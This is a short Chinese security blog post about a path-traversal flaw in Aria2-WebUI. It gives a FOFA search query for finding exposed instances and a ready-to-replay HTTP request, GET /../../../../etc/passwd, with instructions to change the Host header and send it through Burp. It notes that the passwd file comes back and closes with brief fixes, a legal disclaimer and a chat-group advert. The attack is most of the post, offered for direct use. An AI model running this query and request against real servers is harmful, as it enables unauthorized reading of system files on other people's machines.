声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。感谢您的理解与支持!
0x01 FOFA语法
app="Aria2-WebUI"
页面大概是长这个样子的
老样子直接把POC放在Burp重放一下改一下Host就行。
0x02 POC
放在Burp跑跑跑跑跑!!!!!!!!
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0
Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
哦吼哦吼,怎么回事老弟,passwd怎么出来了。
0x03 修复建议
关闭互联网暴露面或部署WAF防护
升级至安全版本
小编提示:未经授权的渗透测试属于违法行为!!!!
还没有加群聊的师傅们赶紧冲啊,群里面有很多工具,经验分享等。目前免费啊!!!
个人观点,仅供参考